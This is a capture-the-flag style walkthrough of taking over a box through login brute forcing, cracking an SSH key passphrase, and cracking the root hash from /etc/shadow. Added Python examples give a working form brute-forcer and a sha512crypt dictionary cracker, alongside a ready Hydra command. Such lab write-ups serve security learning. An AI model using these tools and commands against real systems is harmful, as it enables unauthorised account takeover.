Using John the Ripper to crack an RSA private key, followed by privilege escalation to root
My initial nmap scan showed ports 22 (SSH) and 80 (HTTP) open.
I then moved on to port 80 reconnaissance, which gave me a simple server info page.
Next, a directory brute force to see if I could find anything more, and I did: an admin page.
Within this admin page we find the note "not secure source code!" Whoo-hoo.
It also gives us two possible usernames, john and admin (classic).
I made a throw-away login attempt and noted the error the page returned. I then gave that failure response to Hydra as its failure condition, along with the admin username and a wordlist, and it cracked the password.
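The way Hydra decides a guess failed is worth seeing in code: with an `F=` condition it posts each candidate and treats any response that does NOT contain the failure string as a hit. The block below is an added example, not part of the original writeup and not the target's code. It spins up a constructed local login page (field names `username`/`password`, the failure text "Invalid login" and the credentials are all assumptions made up for the demo) and runs a wordlist against it the same way.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the admin login page. Credentials and the
# failure text are assumptions for this demo, not the real target's.
VALID_CREDS = {"admin": "s3cr3t"}
FAIL_STRING = "Invalid login"


class LoginHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if VALID_CREDS.get(user) == password:
            body = b"<h1>Developer alert page</h1>"
        else:
            body = f"<p>{FAIL_STRING}</p>".encode()
        # Same 200 status either way: only the body tells success from failure,
        # which is exactly why Hydra's F= string match is needed here.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_server():
    """Bind the fake login page on a random loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def form_bruteforce(url, user, wordlist, fail_string):
    """Mirror of hydra's http-post-form with an F= failure condition:
    a response body that does NOT contain fail_string counts as a valid login."""
    for candidate in wordlist:
        data = urllib.parse.urlencode({"username": user, "password": candidate}).encode()
        with urllib.request.urlopen(url, data=data, timeout=5) as resp:
            body = resp.read().decode()
        if fail_string not in body:
            return candidate
    return None


# Constructed mini wordlist standing in for rockyou.txt.
DEFAULT_WORDLIST = ["password", "123456", "admin", "letmein", "s3cr3t", "qwerty"]


def demo(wordlist=DEFAULT_WORDLIST):
    """Start the fake page, attack it as 'admin', return the cracked password or None."""
    srv = start_server()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/admin/"
        return form_bruteforce(url, "admin", wordlist, FAIL_STRING)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("cracked:", demo())
```

Against the real box the equivalent Hydra call would look like `hydra -l admin -P wordlist.txt <target> http-post-form "/admin/:username=^USER^&password=^PASS^:F=Invalid login"`, with the path, field names and failure string taken from your own throw-away attempt. If the page instead signals failure with a different HTTP status rather than a body string, use an `S=` success condition instead of `F=`.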
We now have a password. Cool, right?
A successful login drops me straight onto an alert page from the developer containing an RSA private key. Big no-no to have that out in the wild.
So I grab that RSA private key, save it to a file and run John the Ripper against it to recover its passphrase (ssh2john turns the encrypted key into a hash John can attack with a wordlist).
We already know SSH is open on port 22, so let's use the key and its passphrase to log in (the key file has to be chmod 600, or ssh refuses to use it).
And voilà.
The user john is great, but let's go for root! From john's account we can read the root user's password hash in /etc/shadow.
After copying that hash out and running it through John, I now have the root user's password!
Password achieved. A simple su command gives us a root shell, and we are in.
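What John is actually doing with that shadow entry is recomputing sha512crypt (the `$6$` scheme) for every wordlist candidate with the salt from the hash and comparing the result. The block below is an added example, not from the original writeup: a pure-Python sha512crypt following Drepper's specification, a parser for the `$6$[rounds=N$]salt$hash` field, and a dictionary attack over a constructed shadow line. The root entry and its password "castle1", the salt and the wordlist are all made up here, not the target's real data.

```python
import hashlib

# crypt(3) base64 alphabet (not the RFC 4648 one)
_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Byte permutation the sha512crypt spec applies to the 64-byte digest before encoding
_ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
          (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
          (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
          (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
          (62, 20, 41)]


def _b64_from_24bit(b2, b1, b0, n):
    """Encode one 24-bit group as n crypt-base64 characters, low 6 bits first."""
    v = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out += _B64[v & 0x3F]
        v >>= 6
    return out


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """sha512crypt ($6$) as specified by Drepper and implemented in glibc."""
    salt = salt[:16]                      # glibc caps the salt at 16 bytes
    plen, slen = len(password), len(salt)
    b = hashlib.sha512(password + salt + password).digest()
    a = hashlib.sha512(password + salt)
    cnt = plen                            # add B once per 64 bytes of password, then the remainder
    while cnt > 64:
        a.update(b)
        cnt -= 64
    a.update(b[:cnt])
    cnt = plen                            # walk the bits of len(password), low bit first
    while cnt > 0:
        a.update(b if cnt & 1 else password)
        cnt >>= 1
    a = a.digest()
    dp = hashlib.sha512(password * plen).digest()
    p = (dp * (plen // 64 + 1))[:plen]    # P sequence: DP repeated to len(password)
    ds = hashlib.sha512(salt * (16 + a[0])).digest()
    s = (ds * (slen // 64 + 1))[:slen]    # S sequence: DS repeated to len(salt)
    c = a
    for i in range(rounds):               # the cost loop John has to grind through per guess
        h = hashlib.sha512(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    enc = "".join(_b64_from_24bit(c[x], c[y], c[z], 4) for x, y, z in _ORDER)
    enc += _b64_from_24bit(0, 0, c[63], 2)
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{prefix}{salt.decode()}${enc}"


def parse_shadow_field(field: str):
    """Split '$6$[rounds=N$]salt$hash' into (salt, rounds, hash)."""
    parts = field.split("$")
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt ($6$) hash")
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        parts.pop(2)
    return parts[2], rounds, parts[3]


def crack_shadow_line(line: str, wordlist):
    """Dictionary attack on one /etc/shadow line; returns (user, password or None)."""
    user, field = line.split(":")[:2]
    salt, rounds, digest = parse_shadow_field(field)
    for cand in wordlist:
        computed = sha512_crypt(cand.encode(), salt.encode(), rounds)
        if computed.rsplit("$", 1)[1] == digest:   # compare only the hash part
            return user, cand
    return user, None


# Constructed sample data: a root entry generated with the demo password "castle1"
# and a tiny wordlist standing in for rockyou. Neither is the real target's.
SHADOW_LINE = "root:" + sha512_crypt(b"castle1", b"Xy9qLmTp") + ":18000:0:99999:7:::"
WORDLIST = ["password", "123456", "letmein", "castle1", "qwerty"]

if __name__ == "__main__":
    print(crack_shadow_line(SHADOW_LINE, WORDLIST))
```

The implementation is checked against the spec's published vector (password "Hello world!", salt "saltstring"). Each guess costs 5000 SHA-512 compressions by default, which is why a salted slow hash buys time against a wordlist and why John's optimised code, not Python, is the right tool once the hash is copied out of /etc/shadow.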
Keys to the castle!